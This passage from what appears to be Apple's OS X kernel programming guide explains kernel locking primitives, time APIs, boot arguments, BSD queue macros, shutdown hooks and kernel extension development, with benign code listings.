Because mutexes are based on blocking, they can only be used in places where blocking is allowed. For this reason, mutexes cannot be used in the context of interrupt handlers. Interrupt handlers are not allowed to block because interrupts are disabled for the duration of an interrupt handler, and thus, if an interrupt handler blocked, it would prevent the scheduler from receiving timer interrupts, which would prevent any other thread from executing, resulting in deadlock.

For a similar reason, it is not reasonable to block within the scheduler. Also, blocking within the VM system can easily lead to deadlock if the lock you are waiting for is held by a task that is paged out.

However, unlike simple locks, it is permissible to block while holding a mutex. This would occur, for example, if you took one lock, then tried to take another, but the second lock was being held by another thread.
However, this is generally not recommended unless you carefully scrutinize all uses of that mutex for possible circular waits, as it can result in deadlock. You can avoid this by always taking locks in a certain order.

In general, blocking while holding a mutex specific to your code is fine as long as you wrote your code correctly, but blocking while holding a more global mutex is probably not, since you may not be able to guarantee that other developers’ code obeys the same ordering rules.

A Mach mutex is of type lck_mtx_t. The functions that operate on mutexes include:

    lck_mtx_t *lck_mtx_alloc_init(
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_mtx_init(
        lck_mtx_t *lck,
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_mtx_lock(
        lck_mtx_t *lck);

    extern void lck_mtx_unlock(
        lck_mtx_t *lck);

    extern void lck_mtx_destroy(
        lck_mtx_t *lck,
        lck_grp_t *grp);

    extern void lck_mtx_free(
        lck_mtx_t *lck,
        lck_grp_t *grp);

    extern wait_result_t lck_mtx_sleep(
        lck_mtx_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible);

    extern wait_result_t lck_mtx_sleep_deadline(
        lck_mtx_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible,
        uint64_t deadline);

    extern void lck_mtx_assert(
        lck_mtx_t *lck,
        unsigned int type);

as described in .

The arguments to these functions are described in detail in “Using Lock Functions” (page 139).

Read-Write Locks

Read-write locks (also called shared-exclusive locks) are somewhat different from traditional locks in that they are not always exclusive locks. A read-write lock is useful when shared data can be reasonably read concurrently by multiple threads except while a thread is modifying the data.
Read-write locks can dramatically improve performance if the majority of operations on the shared data are in the form of reads (since it allows concurrency), while having negligible impact in the case of multiple writes.

A read-write lock allows this sharing by enforcing the following constraints:

● Multiple readers can hold the lock at any time.
● Only one writer can hold the lock at any given time.
● A writer must block until all readers have released the lock before obtaining the lock for writing.
● Readers arriving while a writer is waiting to acquire the lock will block until after the writer has obtained and released the lock.

The first constraint allows read sharing. The second constraint prevents write sharing. The third prevents read-write sharing, and the fourth prevents starvation of the writer by a steady stream of incoming readers.

Mach read-write locks also provide the ability for a reader to become a writer and vice-versa. In locking terminology, an upgrade is when a reader becomes a writer, and a downgrade is when a writer becomes a reader. To prevent deadlock, some additional constraints must be added for upgrades and downgrades:

● Upgrades are favored over writers.
● The second and subsequent concurrent upgrades will fail, causing that thread’s read lock to be released.

The first constraint is necessary because the reader requesting an upgrade is holding a read lock, and the writer would not be able to obtain a write lock until the reader releases its read lock. In this case, the reader and writer would wait for each other forever. The second constraint is necessary to prevent the deadlock that would occur if two readers wait for the other to release its read lock so that an upgrade can occur.

The functions that operate on read-write locks are:

    extern lck_rw_t *lck_rw_alloc_init(
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_rw_init(
        lck_rw_t *lck,
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_rw_lock(
        lck_rw_t *lck,
        lck_rw_type_t lck_rw_type);

    extern void lck_rw_unlock(
        lck_rw_t *lck,
        lck_rw_type_t lck_rw_type);

    extern void lck_rw_lock_shared(
        lck_rw_t *lck);

    extern void lck_rw_unlock_shared(
        lck_rw_t *lck);

    extern void lck_rw_lock_exclusive(
        lck_rw_t *lck);

    extern void lck_rw_unlock_exclusive(
        lck_rw_t *lck);

    extern void lck_rw_destroy(
        lck_rw_t *lck,
        lck_grp_t *grp);

    extern void lck_rw_free(
        lck_rw_t *lck,
        lck_grp_t *grp);

    extern wait_result_t lck_rw_sleep(
        lck_rw_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible);

    extern wait_result_t lck_rw_sleep_deadline(
        lck_rw_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible,
        uint64_t deadline);

This is a more complex interface than that of the other locking mechanisms, and actually is the interface upon which the other locks are built.

The functions lck_rw_lock and lck_rw_unlock lock and unlock a lock as either shared (read) or exclusive (write), depending on the value of lck_rw_type, which can contain either LCK_RW_TYPE_SHARED or LCK_RW_TYPE_EXCLUSIVE. You should always be careful when using these functions, as unlocking a lock held in shared mode using an exclusive call or vice-versa will lead to undefined results.

The arguments to these functions are described in detail in “Using Lock Functions” (page 139).

Spin/Sleep Locks

Spin/sleep locks are not implemented in the OS X kernel. However, they can be easily implemented on top of existing locks if desired.

For short waits on multiprocessor systems, the amount of time spent in the context switch can be greater than the amount of time spent spinning. When the time spent spinning while waiting for the lock becomes greater than the context switch overhead, however, mutexes become more efficient.
For this reason, if there is a large degree of variation in wait time on a highly contended lock, spin/sleep locks may be more efficient than traditional spinlocks or mutexes.

Ideally, a program should be written in such a way that the time spent holding a lock is always about the same, and the choice of locking is clear. However, in some cases, this is not practical for a highly contended lock. In those cases, you may consider using spin/sleep locks.

The basic principle of spin/sleep locks is simple. A thread takes the lock if it is available. If the lock is not available, the thread may enter a spin cycle. After a certain period of time (usually a fraction of a time quantum or a small number of time quanta), the spin routine’s time-out is reached, and it returns failure. At that point, the lock places the waiting thread on a queue and puts it to sleep.

In other variations on this design, spin/sleep locks determine whether to spin or sleep according to whether the lock-holding thread is currently on another processor (or is about to be).

For short wait periods on multiprocessor computers, the spin/sleep lock is more efficient than a mutex, and roughly as efficient as a standard spinlock. For longer wait periods, the spin/sleep lock is significantly more efficient than the spinlock and only slightly less efficient than a mutex. There is a period near the transition between spinning and sleeping in which the spin/sleep lock may behave significantly worse than either of the basic lock types, however. Thus, spin/sleep locks should not be used unless a lock is heavily contended and has widely varying hold times. When possible, you should rewrite the code to avoid such designs.

Using Lock Functions

While most of the locking functions are straightforward, there are a few details related to allocating, deallocating, and sleeping on locks that require additional explanation.
As the syntax of these functions is identical across all of the lock types, this section explains only the usage for spinlocks. Extending this to other lock types is left as a (trivial) exercise for the reader.

The first thing you must do when allocating locks is to allocate a lock group and a lock attribute set. Lock groups are used to name locks for debugging purposes and to group locks by function for general understandability. Lock attribute sets allow you to set flags that alter the behavior of a lock.

The following code illustrates how to allocate an attribute structure and a lock group structure for a lock. In this case, a spinlock is used, but with the exception of the lock allocation itself, the process is the same for other lock types.

Listing 17-1 Allocating lock attributes and groups (lifted liberally from kern_time.c)

    lck_grp_attr_t *tz_slock_grp_attr;
    lck_grp_t *tz_slock_grp;
    lck_attr_t *tz_slock_attr;
    lck_spin_t *tz_slock;

    /* allocate lock group attribute and group */
    tz_slock_grp_attr = lck_grp_attr_alloc_init();
    lck_grp_attr_setstat(tz_slock_grp_attr);
    tz_slock_grp = lck_grp_alloc_init("tzlock", tz_slock_grp_attr);

    /* Allocate lock attribute */
    tz_slock_attr = lck_attr_alloc_init();
    //lck_attr_setdebug(tz_slock_attr); // set the debug flag
    //lck_attr_setdefault(tz_slock_attr); // clear the debug flag

    /* Allocate the spin lock */
    tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr);

The first argument to the lock initializer, of type lck_grp_t, is a lock group. This is used for debugging purposes, including lock contention profiling. The details of lock tracing are beyond the scope of this document; however, every lock must belong to a group (even if that group contains only one lock).

The second argument to the lock initializer, of type lck_attr_t, contains attributes for the lock. Currently, the only attribute available is lock debugging.
This attribute can be set using lck_attr_setdebug and cleared with lck_attr_setdefault.

To dispose of a lock, you simply call the matching free functions. For example:

    lck_spin_free(tz_slock, tz_slock_grp);
    lck_attr_free(tz_slock_attr);
    lck_grp_free(tz_slock_grp);
    lck_grp_attr_free(tz_slock_grp_attr);

Note: While you can safely dispose of the lock attribute and lock group attribute structures, it is important to keep track of the lock group associated with a lock as long as the lock exists, since you will need to pass the group to the lock's matching free function when you deallocate the lock (generally at unload time).

The other two interesting functions are lck_spin_sleep and lck_spin_sleep_deadline. These functions release a spinlock and sleep until an event occurs, then wake. The latter includes a timeout, at which point it will wake even if the event has not occurred.

    extern wait_result_t lck_spin_sleep(
        lck_spin_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible);

    extern wait_result_t lck_spin_sleep_deadline(
        lck_spin_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible,
        uint64_t deadline);

The parameter lck_sleep_action controls whether the lock will be reclaimed after sleeping prior to this function returning. The valid options are:

LCK_SLEEP_DEFAULT
    Release the lock while waiting for the event, then reclaim it. Read-write locks are held in the same mode as they were originally held.

LCK_SLEEP_UNLOCK
    Release the lock and return with the lock unheld.

LCK_SLEEP_SHARED
    Reclaim the lock in shared mode (read-write locks only).

LCK_SLEEP_EXCLUSIVE
    Reclaim the lock in exclusive mode (read-write locks only).

The event parameter can be any arbitrary integer, but it must be unique across the system.
To ensure uniqueness, a common programming practice is to use the address of a global variable (often the one containing a lock) as the event value. For more information on these events, see “Event and Timer Waits” (page 143).

The parameter interruptible indicates whether the scheduler should allow the wait to be interrupted by asynchronous signals. If this is false, any false wakes will result in the process going immediately back to sleep (with the exception of a timer expiration signal, which will still wake lck_spin_sleep_deadline).

Miscellaneous Kernel Services

This chapter contains information about miscellaneous services provided by the OS X kernel. For most projects, you will probably never need to use most of these services, but if you do, you will find it hard to do without them.

This chapter contains these sections: “Using Kernel Time Abstractions” (page 142), “Boot Option Handling” (page 146), “Queues” (page 147), and “Installing Shutdown Hooks” (page 148).

Using Kernel Time Abstractions

There are two basic groups of time abstractions in the kernel. One group includes functions that provide delays and timed wake-ups. The other group includes functions and variables that provide the current wall clock time, the time used by a given process, and other similar information. This section describes both aspects of time from the perspective of the kernel.

Obtaining Time Information

There are a number of ways to get basic time information from within the kernel. The officially approved methods are those that Mach exports in kern/clock.h.
These include the following:

    void clock_get_uptime(uint64_t *result);

    void clock_get_system_microtime(
        uint32_t *secs,
        uint32_t *microsecs);

    void clock_get_system_nanotime(
        uint32_t *secs,
        uint32_t *nanosecs);

    void clock_get_calendar_microtime(
        uint32_t *secs,
        uint32_t *microsecs);

    void clock_get_calendar_nanotime(
        uint32_t *secs,
        uint32_t *nanosecs);

The function clock_get_uptime returns a value in AbsoluteTime units. For more information on using AbsoluteTime, see “Using Mach Absolute Time Functions” (page 144).

The functions clock_get_system_microtime and clock_get_system_nanotime return 32-bit integers containing seconds and microseconds or nanoseconds, respectively, representing the system uptime.

The functions clock_get_calendar_microtime and clock_get_calendar_nanotime return 32-bit integers containing seconds and microseconds or nanoseconds, respectively, representing the current calendar date and time since the epoch (January 1, 1970).

In some parts of the kernel, you may find other functions that return type mach_timespec_t. This type is similar to the traditional BSD struct timespec (both measure fractions of a second in nanoseconds), but it is declared with different field types:

    struct mach_timespec {
        unsigned int tv_sec;
        clock_res_t tv_nsec;
    };
    typedef struct mach_timespec *mach_timespec_t;

In addition to the traditional Mach functions, if you are writing code in BSD portions of the kernel you can also get the current calendar (wall clock) time as a BSD timeval, as well as find out the calendar time when the system was booted by doing the following:

    #include
    struct timeval tv=time; /* calendar time */
    struct timeval tv_boot=boottime; /* calendar time when booting occurred */

For other information, you should use the Mach functions listed previously.

Event and Timer Waits

Each part of the OS X kernel has a distinct API for waiting a certain period of time.
In most cases, you can call these functions from other parts of the kernel. The I/O Kit provides IODelay and IOSleep. Mach provides functions based on AbsoluteTime, as well as a few based on microseconds. BSD provides msleep.

Using IODelay and IOSleep

IODelay, provided by the I/O Kit, abstracts a timed spin. If you are delaying for a short period of time, and if you need to be guaranteed that your wait will not be stopped prematurely by delivery of asynchronous events, this is probably the best choice. If you need to delay for several seconds, however, this is a bad choice, because the CPU that executes the wait will spin until the time has elapsed, unable to handle any other processing.

IOSleep puts the currently executing thread to sleep for a certain period of time. There is no guarantee that your thread will execute after that period of time, nor is there a guarantee that your thread will not be awakened by some other event before the time has expired. It is roughly equivalent to the sleep call from user space in this regard.

The use of IODelay and IOSleep is straightforward. Their prototypes are:

    IODelay(unsigned microseconds);
    IOSleep(unsigned milliseconds);

Note the differing units. It is not practical to put a thread to sleep for periods measured in microseconds, and spinning for several milliseconds is also inappropriate.

Using Mach Absolute Time Functions

The following Mach time functions are commonly used. Several others are described in osfmk/kern/clock.h.

Note: These are not the same functions as those listed in kern/clock.h in the Kernel framework. These functions are not exposed to kernel extensions, and are only for use within the kernel itself.
    void delay(uint64_t microseconds);
    void clock_delay_until(uint64_t deadline);
    void clock_absolutetime_interval_to_deadline(uint64_t abstime, uint64_t *result);
    void nanoseconds_to_absolutetime(uint64_t nanoseconds, uint64_t *result);
    void absolutetime_to_nanoseconds(uint64_t abstime, uint64_t *result);

These functions are generally straightforward. However, a few points deserve explanation. Unless specifically stated, all times, deadlines, and so on, are measured in abstime units. The abstime unit is equal to the length of one bus cycle, so the duration is dependent on the bus speed of the computer. For this reason, Mach provides conversion routines between abstime units and nanoseconds.

Many time functions, however, provide time in seconds with nanosecond remainder. In this case, some conversion is necessary. For example, to obtain the current time as a mach abstime value, you might do the following:

    uint32_t secpart;
    uint32_t nsecpart;
    uint64_t nsec, abstime;

    clock_get_calendar_nanotime(&secpart, &nsecpart);
    nsec = nsecpart + (1000000000ULL * secpart); //convert seconds to nanoseconds.
    nanoseconds_to_absolutetime(nsec, &abstime);

The abstime value is now stored in the variable abstime.

Using msleep

In addition to Mach and I/O Kit routines, BSD provides msleep, which is the recommended way to delay in the BSD portions of the kernel. In other parts of the kernel, you should either use wait_queue functions or use assert_wait and thread_wakeup functions, both of which are closely tied to the Mach scheduler, and are described in “Kernel Thread APIs” (page 85). Because this function is more commonly used for waiting on events, it is described further in “Condition Variables” (page 130).

Handling Version Dependencies

Many time-related functions such as clock_get_uptime changed as a result of the transition to KPIs in OS X v.10.4.
While these changes result in a cleaner interface, they can prove challenging if you need to obtain time information across multiple versions of OS X in a kernel extension that would otherwise have no version dependencies (such as an I/O Kit KEXT).

Here is a list of time-related functions that are available in both pre-KPI and KPI versions of OS X:

    uint64_t mach_absolute_time(void);

Declared In:
Dependency: com.apple.kernel.mach
This function returns a Mach absolute time value for the current wall clock time in units of uint64_t.

    void microtime(struct timeval *tv);

Declared In:
Dependency: com.apple.kernel.bsd
This function returns a timeval struct containing the current wall clock time.

    void microuptime(struct timeval *tv);

Declared In:
Dependency: com.apple.kernel.bsd
This function returns a timeval struct containing the current uptime.

    void nanotime(struct timespec *ts);

Declared In:
Dependency: com.apple.kernel.bsd
This function returns a timespec struct containing the current wall clock time.

    void nanouptime(struct timespec *ts);

Declared In:
Dependency: com.apple.kernel.bsd
This function returns a timespec struct containing the current uptime.

Note: The structure declarations for struct timeval and struct timespec differ between 10.3 and 10.4 in their use of int, int32_t, and long data types. However, because the structure packing for the underlying data types is identical in the 32-bit world, these structures are assignment compatible.

In addition to these APIs, the functionality marked __APPLE_API_UNSTABLE in was adopted as-is in OS X v.10.4 and is no longer marked unstable.

Boot Option Handling

OS X provides a simple parse routine, PE_parse_boot_arg, for basic boot argument passing. It supports both flags and numerical value assignment.
For obtaining values, you write code similar to the following:

    unsigned int argval;

    if (PE_parse_boot_arg("argflag", &argval)) {
        /* check for reasonable value */
        if (argval < 10 || argval > 37)
            argval = 37;
    } else {
        /* use default value */
        argval = 37;
    }

Since PE_parse_boot_arg returns a nonzero value if the flag exists, you can check for the presence of a flag by using a flag that starts with a dash (-) and ignoring the value stored in argval.

The PE_parse_boot_arg function can also be used to get a string argument. To do this, you must pass in the address of an array of type char as the second argument. The behavior of PE_parse_boot_arg is undefined if a string is passed in for a numeric variable or vice versa. Its behavior is also undefined if a string exceeds the storage space allocated. Be sure to allow enough space for the largest reasonable string including a null delimiter. No attempt is made at bounds checking, since an overflow is generally a fatal error and should reasonably prevent booting.

Queues

As part of its BSD infrastructure, the OS X kernel provides a number of basic support macros to simplify handling of linked lists and queues. These are implemented as C macros, and assume a standard C struct. As such, they are probably not suited for writing code in C++.

The basic types of lists and queues included are

● SLIST, a singly linked list
● STAILQ, a singly linked tail queue
● LIST, a doubly linked list
● TAILQ, a doubly linked tail queue

SLIST is ideal for creating stacks or for handling large sets of data with few or no removals. Arbitrary removal, however, requires an O(n) traversal of the list.

STAILQ is similar to SLIST except that it maintains pointers to both ends of the queue. This makes it ideal for simple FIFO queues by adding entries at the tail and fetching entries from the head.
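
The FIFO pattern described for STAILQ can be sketched as follows. This is a minimal user-space illustration, not kernel code: it assumes the <sys/queue.h> header shipped with the system C library (which provides the same macro family as the kernel's queue.h), it uses malloc and free where kernel code would use a kernel allocator, and the names work_item, work_queue, enqueue, and dequeue are hypothetical.

```c
#include <assert.h>
#include <stdlib.h>
#include <sys/queue.h>

/* Hypothetical element type; the names are illustrative only. */
struct work_item {
    int id;                         /* assumed non-negative in this sketch */
    STAILQ_ENTRY(work_item) link;   /* embeds the "next" pointer */
};

/* Declares struct work_queue, which tracks both ends of the list. */
STAILQ_HEAD(work_queue, work_item);

/* Appends a new item at the tail. Returns 0 on success, -1 on failure. */
static int enqueue(struct work_queue *q, int id)
{
    struct work_item *item;

    assert(q != NULL);
    item = malloc(sizeof(*item));
    if (item == NULL)
        return -1;
    item->id = id;
    STAILQ_INSERT_TAIL(q, item, link);
    return 0;
}

/* Removes the head item and returns its id, or -1 if the queue is empty. */
static int dequeue(struct work_queue *q)
{
    struct work_item *item;
    int id;

    assert(q != NULL);
    item = STAILQ_FIRST(q);
    if (item == NULL)
        return -1;
    id = item->id;
    STAILQ_REMOVE_HEAD(q, link);
    free(item);
    return id;
}
```

A caller would declare a struct work_queue, initialize it once with STAILQ_INIT, and then pair enqueue and dequeue calls; items come back in the order they were added. Both operations touch only the ends of the list, which is why no traversal is needed.
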
Like SLIST, STAILQ is inefficient at removing arbitrary elements.

LIST is a doubly linked version of SLIST. The extra pointers require additional space, but allow O(1) (constant time) removal of arbitrary elements and bidirectional traversal.

TAILQ is a doubly linked version of STAILQ. Like LIST, the extra pointers require additional space, but allow O(1) (constant time) removal of arbitrary elements and bidirectional traversal.

Because the functionality of these macros is relatively simple, their use is equally straightforward. These macros can be found in xnu/bsd/sys/queue.h.

Installing Shutdown Hooks

Although OS X does not have traditional BSD-style shutdown hooks, the I/O Kit provides equivalent functionality in recent versions. Since the I/O Kit provides this functionality, you must call it from C++ code.

To register for notification, you call registerSleepWakeInterest (described in IOKit/RootDomain.h) and register for sleep notification. If the system is about to be shut down, your handler is called with the message type kIOMessageSystemWillPowerOff. If the system is about to reboot, your handler gets the message type kIOMessageSystemWillRestart. If the system is about to sleep, your handler gets the message type kIOMessageSystemWillSleep.

If you no longer need to receive notification (for example, if your KEXT gets unloaded), be certain to remove the notifier with IONotifier::remove, as the stop routine in the sample does, to avoid a kernel panic on shutdown.

For example, the following sample KEXT registers for sleep notifications, then logs a message with IOLog when a sleep notification occurs:

    #include
    #include
    #include
    #include
    #include

    #define ALLOW_SLEEP 1

    IONotifier *notifier;

    extern "C" {

    IOReturn mySleepHandler(void *target, void *refCon,
        UInt32 messageType, IOService *provider,
        void *messageArgument, vm_size_t argSize)
    {
        IOLog("Got sleep/wake notice. Message type was %u\n",
            (unsigned int)messageType);
    #if ALLOW_SLEEP
        acknowledgeSleepWakeNotification(refCon);
    #else
        vetoSleepWakeNotification(refCon);
    #endif
        return 0;
    }

    kern_return_t sleepkext_start(kmod_info_t *ki, void *d)
    {
        void *myself = NULL; // Would pass the self pointer here if in a class instance

        notifier = registerPrioritySleepWakeInterest(
            &mySleepHandler, myself, NULL);
        return KERN_SUCCESS;
    }

    kern_return_t sleepkext_stop(kmod_info_t *ki, void *d)
    {
        if (notifier != NULL)   // registration may have failed
            notifier->remove();
        return KERN_SUCCESS;
    }

    } // extern "C"

Kernel Extension Overview

As discussed in the chapter “Kernel Architecture Overview” (page 14), OS X provides a kernel extension mechanism as a means of allowing dynamic loading of code into the kernel, without the need to recompile or relink. Because these kernel extensions (KEXTs) provide both modularity and dynamic loadability, they are a natural choice for any relatively self-contained service that requires access to internal kernel interfaces.

Because KEXTs run in supervisor mode in the kernel’s address space, they are also harder to write and debug than user-level modules, and must conform to strict guidelines. Further, kernel resources are wired (permanently resident in memory) and are thus more costly to use than resources in a user-space task of equivalent functionality.

In addition, although memory protection keeps applications from crashing the system, no such safeguards are in place inside the kernel. A badly behaved kernel extension in OS X can cause as much trouble as a badly behaved application or extension could in Mac OS 9.

Bugs in KEXTs can have far more severe consequences than bugs in user-level code.
For example, a memory access error in a user application can, at worst, cause that application to crash. In contrast, a memory access error in a KEXT causes a kernel panic, crashing the operating system.

Finally, for security reasons, some customers restrict or don’t permit the use of third-party KEXTs. As a result, use of KEXTs is strongly discouraged in situations where user-level solutions are feasible. OS X guarantees that threading in applications is just as efficient as threading inside the kernel, so efficiency should not be an issue. Unless your application requires low-level access to kernel interfaces, you should use a higher level of abstraction when developing code for OS X.

When you are trying to determine if a piece of code should be a KEXT, the default answer is generally no. Even if your code was a system extension in Mac OS 9, that does not necessarily mean that it should be a kernel extension in OS X. There are only a few good reasons for a developer to write a kernel extension:

● Your code needs to take a primary interrupt; that is, something in the (built-in) hardware needs to interrupt the CPU and execute a handler.
● The primary client of your code is inside the kernel (for example, a block device whose primary client is a file system).
● Your code needs to access kernel interfaces that are not exported to user space.
● Your code has other special requirements that cannot be satisfied in a user space application.

If your code does not meet any of the above criteria (and possibly even if it does), you should consider developing it as a library or a user-level daemon, or using one of the user-level plug-in architectures (such as QuickTime components or the Core Graphics framework) instead of writing a kernel extension.

If you are writing device drivers or code to support a new volume format or networking protocol, however, KEXTs may be the only feasible solution.
Fortunately, while KEXTs may be more difficult to write than user-space code, several tools and procedures are available to enhance the development and debugging process. See “Debugging Your KEXT” (page 153) for more information.

This chapter provides a conceptual overview of KEXTs and how to create them. If you are interested in building a simple KEXT, see the Apple tutorials listed in the bibliography. These provide step-by-step instructions for creating a simple, generic KEXT or a basic I/O Kit driver.

Implementation of a Kernel Extension (KEXT)

Kernel extensions are implemented as bundles, folders that the Finder treats as single files. See the chapter about bundles in Mac Technology Overview for a discussion of bundles. The KEXT bundle can contain the following:

● Information property list: a text file that describes the contents, settings, and requirements of the KEXT. This file is required. A KEXT bundle need contain nothing more than this file, although most KEXTs contain one or more kernel modules as well. See the chapter about software configuration in Mac Technology Overview for further information about property lists.
● KEXT binary: a file in Mach-O format, containing the actual binary code used by the KEXT. A KEXT binary (also known as a kernel module or KMOD) represents the minimum unit of code that can be loaded into the kernel. A KEXT usually contains one KEXT binary. If no KEXT binaries are included, the information property list file must contain a reference to another KEXT and change its default settings.
● Resources: for example, icons or localization dictionaries. Resources are optional; they may be useful for a KEXT that needs to display a dialog or menu. At present, no resources are explicitly defined for use with KEXTs.
● KEXT bundles: a KEXT can contain other KEXTs. This can be used for plug-ins that augment features of a KEXT.

Kernel Extension Dependencies

Any KEXT can declare that it is dependent upon any other KEXT.
The developer lists these dependencies in the OSBundleLibraries dictionary in the module’s property list file.

Before a KEXT is loaded, all of its requirements are checked. Those required extensions (and their requirements) are loaded first, iterating back through the lists until there are no more required extensions to load. Only after all requirements are met is the requested KEXT loaded as well.

For example, device drivers (a type of KEXT) are dependent upon (require) certain families (another type of KEXT). When a driver is loaded, its required families are also loaded to provide necessary, common functionality. To ensure that all requirements are met, each device driver should list all of its requirements (families and other drivers) in its property list. See the chapter “I/O Kit Overview” (page 94) for an explanation of drivers and families.

It is important to list all dependencies for each KEXT. If your KEXT fails to do so, it may not load due to unrecognized symbols, thus rendering the KEXT useless. Dependencies in KEXTs can be considered analogous to required header files or libraries in code development; in fact, the Kernel Extension Manager uses the standard linker to resolve KEXT requirements.

Building and Testing Your Extension

After creating the necessary property list and C or C++ source files, you use Project Builder to build your KEXT. Any errors in the source code are brought to your attention during the build and you are given the chance to edit your source files and try again.

To test your KEXT, however, you need to leave Project Builder and work in the Terminal application (or in console mode). In console mode, all system messages are written directly to your screen, as well as to a log file (/var/log/system.log).
If you work in the Terminal application, you must view system messages in the log file or in the Console application. You also need to log in to the root account (or use the su or sudo command), since only the root account can load kernel extensions.

When testing your KEXT, you can load and unload it manually, as well as check the load status. You can use the kextload command to load any KEXT. A manual page for kextload is included in OS X. (On OS X prior to 10.2, you must use the kmodload command instead.)

Note that this command is useful only when developing a KEXT. Eventually, after it has been tested and debugged, you install your KEXT in one of the standard places (see “Installed KEXTs” (page 154) for details). Then, it will be loaded and unloaded automatically at system startup and shutdown or whenever it is needed (such as when a new device is detected).

Debugging Your KEXT

KEXT debugging can be complicated. Before you can debug a KEXT, you must first enable kernel debugging, as OS X is not normally configured to permit debugging the kernel. Only the root account can enable kernel debugging, and you need to reboot OS X for the changes to take effect. (You can use sudo to gain root privileges if you don’t want to enable a root password.)

Kernel debugging is performed using two OS X computers, called the development or debug host and the debug target. These computers must be connected over a reliable network connection on the same subnet (or within a single local network). Specifically, there must not be any intervening IP routers or other devices that could make hardware-based Ethernet addressing impossible.

The KEXT is registered (and loaded and run) on the target. The debugger is launched and run on the debug host. You can also rebuild your KEXT on the debug host, after you fix any errors you find.

Debugging must be performed in this fashion because you must temporarily halt the kernel on the target in order to use the debugger. When you halt the kernel, all other processes on that computer stop. However, a debugger running remotely can continue to run and can continue to examine (or modify) the kernel on the target.

Note that bugs in KEXTs may cause the target kernel to freeze or panic. If this happens, you may not be able to continue debugging, even over a remote connection; you have to reboot the target and start over, setting a breakpoint just before the code where the KEXT crashed and working very carefully up to the crash point.

Developers generally debug KEXTs using gdb, a source-level debugger with a command-line interface. You will need to work in the Terminal application to run gdb. For detailed information about using gdb, see the documentation included with OS X. You can also use the help command from within gdb.

Some features of gdb are unavailable when debugging KEXTs because of implementation limitations. For example:

● You can’t use gdb to call a function or method in a KEXT.
● You should not use gdb to debug interrupt routines.

The former is largely a barrier introduced by the C++ language. The latter may work in some cases but is not recommended due to the potential for gdb to interrupt something upon which kdp (the kernel shim used by gdb) depends in order to function properly.

Use care that you do not halt the kernel for too long when you are debugging (for example, when you set breakpoints). In a short time, internal inconsistencies can appear that cause the target kernel to panic or freeze, forcing you to reboot the target.

Additional information about debugging can be found in “When Things Go Wrong: Debugging the Kernel” (page 161).

Installed KEXTs

The Kernel Extension Manager (KEXT Manager) is responsible for loading and unloading all installed KEXTs (commands such as kextload are used only during development). Installed KEXTs are dynamically added to the running OS X kernel as part of the kernel’s address space. An installed and enabled KEXT is invoked as needed.

Important: Note that KEXTs are only wrappers (bundles) around a property list, KEXT binaries (or references to other KEXTs), and optional resources. The KEXT describes what is to be loaded; it is the KEXT binaries that are actually loaded.

KEXTs are usually installed in the folder /System/Library/Extensions. The Kernel Extension Manager (in the form of a daemon, kextd) always checks here. KEXTs can also be installed in ROM or inside an application bundle.

Installing KEXTs in an application bundle allows an application to register those KEXTs without the need to install them permanently elsewhere within the system hierarchy. This may be more convenient and allows the KEXT to be associated with a specific, running application. When it starts, the application can register the KEXT and, if desired, unregister it on exit.

For example, a network packet sniffer application might employ a Network Kernel Extension (NKE). A tape backup application would require that a tape driver be loaded for the duration of the backup process. When the application exits, the kernel extension is no longer needed and can be unloaded.

Note that, although the application is responsible for registering the KEXT, this is no guarantee that the corresponding KEXTs are actually ever loaded. It is still up to a kernel component, such as the I/O Kit, to determine a need, such as matching a piece of hardware to a desired driver, thus causing the appropriate KEXTs (and their dependencies) to be loaded.

Building and Debugging Kernels

This chapter is not about building kernel extensions (KEXTs).
There are a number of good KEXT tutorials on Apple’s developer documentation site (http://developer.apple.com/documentation). This chapter is about adding new in-kernel modules (optional parts of the kernel), building kernels, and debugging kernel and kernel extension builds.

The discussion is divided into three sections. The first, “Adding New Files or Modules” (page 155), describes how to add new functionality into the kernel itself. You should only add files into the kernel when the use of a KEXT is not possible (for example, when adding certain low-level motherboard hardware support).

The second section, “Building Your First Kernel” (page 158), describes how to build a kernel, including how to build a kernel with debugger support, how to add new options, and how to obtain sources that are of similar vintage to those in a particular version of OS X or Darwin.

The third section, “When Things Go Wrong: Debugging the Kernel” (page 161), tells how to debug a kernel or kernel module using ddb and gdb. This is a must-read for anyone doing kernel development.

Adding New Files or Modules

In this context, the term module is used loosely to refer to a collection of related files in the kernel that are controlled by a single config option at compile time. It does not refer to loadable modules (KEXTs). This section describes how to add additional files that will be compiled into the kernel, including how to add a new config option for an additional module.

Modifying the Configuration Files

The details of adding a new file or module into the kernel differ according to what portion of the kernel contains the file. If you are adding a new file or module into the Mach portion of the kernel, you need to list it in various files in xnu/osfmk/conf. For the BSD portion of the kernel, you should list it in various files in xnu/bsd/conf. In either case, the procedure is basically the same, just in a different directory.

This section is divided into two subsections.
The first describes adding the module itself and the second describes enabling the module.

Adding the Files or Modules

In the appropriate conf directory, you need to add your files or modules into various files. The files MASTER, MASTER.ppc, and MASTER.i386 contain the list of configuration options that should be built into the kernel for all architectures, PowerPC, and i386, respectively.

These are supplemented by files, files.ppc, and files.i386, which contain associations between compile options and the files that are related to them for their respective architectures.

The format of these files is relatively straightforward. If you are adding a new module, you should first choose a name for that module. For example, if your module is called mach_foo, you should then add a new option line near the top of files that is whitespace (space or tab) delimited and looks like this:

    OPTIONS/mach_foo    optional    mach_foo

The first part defines the name of the module as it will be used in #if statements in the code. (See “Modifying the Source Code Files” (page 157) for more information.) The second part is always the word optional. The third part tells the name of the option as used to turn it on or off in a MASTER file. Any line with mach_foo in the last field will be enabled only if there is an appropriate line in a MASTER file.

Then, later in the file, you add

    osfmk/foo/foo_main.c    optional    mach_foo
    osfmk/foo/foo_bar.c     optional    mach_foo

